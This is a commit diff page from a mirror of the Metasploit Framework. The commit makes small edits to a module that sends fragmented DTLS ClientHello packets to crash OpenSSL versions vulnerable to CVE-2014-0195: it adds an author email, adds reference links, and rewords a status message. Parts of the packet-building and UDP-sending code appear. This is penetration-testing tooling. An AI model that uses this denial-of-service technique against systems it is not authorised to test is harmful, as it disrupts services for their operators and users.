infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor fixup on DTLS module

unstable
Tod Beardsley 2014-06-09 13:42:30 -05:00
parent 0e611b5d64
commit 0e14d77dba
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
View File

@ -12,17 +12,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS', 'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS',
'Description' => %q{ 'Description' => %q{
This module performs a Denial of Service Attack against Datagram TLS in This module performs a Denial of Service Attack against Datagram TLS in
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h. OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.
This occurs when a DTLS ClientHello message has multiple fragments and the This occurs when a DTLS ClientHello message has multiple fragments and the
fragment lengths of later fragments are larger than that of the first, a fragment lengths of later fragments are larger than that of the first, a
buffer overflow occurs, causing a DoS. buffer overflow occurs, causing a DoS.
}, },
'Author' => 'Author' =>
[ [
'Juri Aedla', # Vulnerability discovery 'Juri Aedla <asd[at]ut.ee>' # Vulnerability discovery
'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module 'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -30,7 +30,9 @@ class Metasploit3 < Msf::Auxiliary
[ [
['CVE', '2014-0195'], ['CVE', '2014-0195'],
['ZDI', '14-173'], ['ZDI', '14-173'],
['BID', '67900'] ['BID', '67900'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048']
], ],
'DisclosureDate' => 'Jun 05 2014')) 'DisclosureDate' => 'Jun 05 2014'))
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234)) fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments) message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
connect_udp connect_udp
print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}") print_status("#{rhost}:#{rport} - Sending fragmented DTLS client hello packet")
udp_sock.put(message) udp_sock.put(message)
disconnect_udp disconnect_udp
end end